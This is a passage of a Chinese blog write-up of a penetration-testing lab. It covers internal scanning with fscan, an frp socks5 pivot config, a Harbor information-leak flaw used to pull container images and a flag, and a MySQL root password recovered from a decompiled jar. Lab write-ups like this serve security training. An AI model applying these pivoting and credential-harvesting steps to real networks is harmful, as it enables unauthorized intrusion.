<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220100135103-531415802.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220100137539"
	
	
></p>
<h3 id="17228233359696">172.28.23.33:59696
</h3><p>对<strong>pwn</strong>还没学，这题先放这吧</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">flag03
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="1722214024">172.22.14.0/24
</h2><p>传fscan，扫内网，浏览器界面不方便操作，蚁剑换成<code>PHP7_Backtrace_UAF</code>绕过，这个模式可以用命令行，但不稳定</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220111639439-1521119402.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220111641746"
	
	
></p>
<p>fscan对于<code>172.22.14.0/24</code>网段信息收集</p>
<p>这里少了k8s的机器，可能是环境出问题了，等有沙砾了再重新打一次</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220111857889-1281749671.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220111900460"
	
	
></p>
<h3 id="内网二层代理">内网二层代理
</h3><blockquote>
<p>8.130.71.173-公网入口&ndash;同机器172.28.23.17</p>
<p>frps</p>
<p>[common]
bind_port = 7000</p>
</blockquote>
<blockquote>
<p>172.28.23.33</p>
<p>frpc</p>
<p>[common]
server_addr =172.28.23.17</p>
<p>server_port = 7000</p>
<p>[socks5]
type = tcp</p>
<p>remote_port = 6000</p>
<p>plugin = socks5</p>
</blockquote>
<h3 id="172221437-k8s-api未授权">172.22.14.37-k8s API未授权
</h3><p>靶机访问不到，两次都打不开，很奇怪</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">flag04
</span></span></code></pre></td></tr></table>
</div>
</div><h3 id="172221446-harbor">172.22.14.46-harbor
</h3><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220113651083-1423146153.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220113652871"
	
	
></p>
<p>公开信息泄露漏洞去打</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220114138918-683375902.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220114141031"
	
	
></p>
<p>在<code>413e572f115e1674c52e629b3c53a42bf819f98c1dbffadc30bda0a8f39b0e49</code>包下找到flag</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">flag05: flag{8c89ccd3-029d-41c8-8b47-98fb2006f0cf}
</span></span></code></pre></td></tr></table>
</div>
</div><p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220114233537-114216208.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220114235741"
	
	
></p>
<p>继续分析<code>run.sh</code>，兔子洞</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220114428251-399098312.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220114430873"
	
	
></p>
<h3 id="172221028-mysql-udf提权">172.22.10.28-mysql-udf提权
</h3><p>分析其他镜像找线索，<code>project/projectadmin</code>镜像下找到另一份带有<code>ProjectAdmin-0.0.1-SNAPSHOT.jar</code>包的文件</p>
<p>反编译，找到了数据库密码</p>
<blockquote>
<p>172.22.10.28</p>
<p>spring.datasource.username=root
spring.datasource.password=My3q1i4oZkJm3</p>
</blockquote>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241220115252345-1442483300.png"
	
	
	
	loading="lazy"
	
		alt="image-20241220115254545"
	
	
></p>
<p>navicate都能连接，工具梭哈连接不到，真是奇怪</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202412/3373819-20241227145611482-2099446302.png"
	
	
	
	loading="lazy"
	
		alt="image-20241227145610664"
	
	
></p>
<p>没时间了，等沙砾赞够了再继续打吧</p>
<div class="highlight"><div class="chroma">
<table class="lntable"><tr><td class="lntd">
<pre tabindex="0" class="chroma"><code><span class="lnt">1
</span></code></pre></td>
<td class="lntd">
<pre tabindex="0" class="chroma"><code class="language-fallback" data-lang="fallback"><span class="line"><span class="cl">flag06
</span></span></code></pre></td></tr></table>
</div>
</div>
</section>


    <footer class="article-footer">
    
    <section class="article-tags">
        
            <a href="/tags/%E6%B8%97%E9%80%8F/">渗透</a>
        
    </section>


    </footer>


    
</article>

    

    

     
    
        
    <script src="https://utteranc.es/client.js" 
        repo=""
        issue-term="pathname"
        
        crossorigin="anonymous"
        async
        >
</script>

<style>
    .utterances {
        max-width: unset;
    }
</style>

<script>
    let utterancesLoaded = false;

    function setUtterancesTheme(theme) {
        let utterances = document.querySelector('.utterances iframe');
        if (utterances) {
            utterances.contentWindow.postMessage(
                {
                    type: 'set-theme',
                    theme: `github-${theme}`
                },
                'https://utteranc.es'
            );
        }
    }

    addEventListener('message', event => {
        if (event.origin !== 'https://utteranc.es') return;

        
        utterancesLoaded = true;
        setUtterancesTheme(document.documentElement.dataset.scheme)
    });

    window.addEventListener('onColorSchemeChange', (e) => {
        if (!utterancesLoaded) return;
        setUtterancesTheme(e.detail)
    })
</script>


    

    <footer class="site-footer">
    <section class="copyright">
        &copy; 
        
        2024 关根
    </section>
    
    <section class="powerby">
        使用 <a href="https://gohugo.io/" target="_blank" rel="noopener">Hugo</a> 构建 <br />
        主题 <b><a href="https://github.com/CaiJimmy/hugo-theme-stack" target="_blank" rel="noopener" data-version="3.29.0">Stack</a></b> 由 <a href="https://jimmycai.com" target="_blank" rel="noopener">Jimmy</a> 设计
    </section>
</footer>


    
<div class="pswp" tabindex="-1" role="dialog" aria-hidden="true">

    
    <div class="pswp__bg"></div>

    
    <div class="pswp__scroll-wrap">

        
        <div class="pswp__container">
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
            <div class="pswp__item"></div>
        </div>

        
        <div class="pswp__ui pswp__ui--hidden">

            <div class="pswp__top-bar">

                

                <div class="pswp__counter"></div>

                <button class="pswp__button pswp__button--close" title="Close (Esc)"></button>

                <button class="pswp__button pswp__button--share" title="Share"></button>

                <button class="pswp__button pswp__button--fs" title="Toggle fullscreen"></button>

                <button class="pswp__button pswp__button--zoom" title="Zoom in/out"></button>

                
                
                <div class="pswp__preloader">
                    <div class="pswp__preloader__icn">
                        <div class="pswp__preloader__cut">
                            <div class="pswp__preloader__donut"></div>
                        </div>
                    </div>
                </div>
            </div>

            <div class="pswp__share-modal pswp__share-modal--hidden pswp__single-tap">
                <div class="pswp__share-tooltip"></div>
            </div>

            <button class="pswp__button pswp__button--arrow--left" title="Previous (arrow left)">
            </button>

            <button class="pswp__button pswp__button--arrow--right" title="Next (arrow right)">
            </button>

            <div class="pswp__caption">
                <div class="pswp__caption__center"></div>
            </div>

        </div>

    </div>

</div><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.js"integrity="sha256-ePwmChbbvXbsO02lbM3HoHbSHTHFAeChekF1xKJdleo="crossorigin="anonymous"
                defer
                >
            </script><script 
                src="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe-ui-default.min.js"integrity="sha256-UKkzOn/w1mBxRmLLGrSeyB4e1xbrp4xylgAWb3M42pU="crossorigin="anonymous"
                defer
                >
            </script><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/default-skin/default-skin.min.css"crossorigin="anonymous"
            ><link 
                rel="stylesheet" 
                href="https://cdn.jsdelivr.net/npm/photoswipe@4.1.3/dist/photoswipe.min.css"crossorigin="anonymous"
            >

            </main>
        </div>
        <script 
                src="https://cdn.jsdelivr.net/npm/node-vibrant@3.1.6/dist/vibrant.min.js"integrity="sha256-awcR2jno4kI5X0zL8ex0vi2z&#43;KMkF24hUW8WePSA9HM="crossorigin="anonymous"
                
                >
            </script><script type="text/javascript" src="/ts/main.1e9a3bafd846ced4c345d084b355fb8c7bae75701c338f8a1f8a82c780137826.js" defer></script>
<script>
    (function () {
        const customFont = document.createElement('link');
        customFont.href = "https://fonts.googleapis.com/css2?family=Lato:wght@300;400;700&display=swap";

        customFont.type = "text/css";
        customFont.rel = "stylesheet";

        document.head.appendChild(customFont);
    }());
</script>

    </body>
</html>
